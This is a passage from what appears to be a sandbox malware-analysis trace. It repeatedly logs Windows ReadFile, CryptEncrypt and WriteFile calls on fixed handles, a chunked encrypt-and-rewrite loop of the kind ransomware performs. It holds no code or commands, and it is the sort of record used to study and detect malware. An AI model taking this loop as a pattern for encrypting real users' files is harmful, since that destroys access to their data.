ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.214] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.214] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.214] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.214] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.214] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.214] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.214] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.214] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.214] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.214] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.214] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.214] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.215] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.215] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.215] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.215] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.215] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.215] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.215] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.215] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.215] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.215] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.215] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.215] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.215] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.215] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.216] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.216] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.216] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.216] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.216] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.216] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.216] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.216] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.216] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.216] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.216] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.216] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.216] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.216] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.216] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.217] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.217] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.217] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.217] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.217] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.217] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.218] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.218] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.218] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.218] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.218] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.218] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.218] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.218] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.218] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.218] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.218] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.218] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.218] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.218] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.218] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.218] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.218] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.219] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.219] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.219] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.219] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.219] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.219] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.219] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.219] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.219] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.219] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.219] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.219] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.219] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.219] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.219] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.220] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.220] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.220] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.220] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.220] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.220] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.220] CryptEncrypt (in: hKey=0x28e7df8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d5a0*=0x380) returned 1 [0246.220] WriteFile (in: hFile=0x5d3c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9d5a0*=0x380, lpOverlapped=0x0) returned 1 [0246.220] ReadFile (in: hFile=0x5d44, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 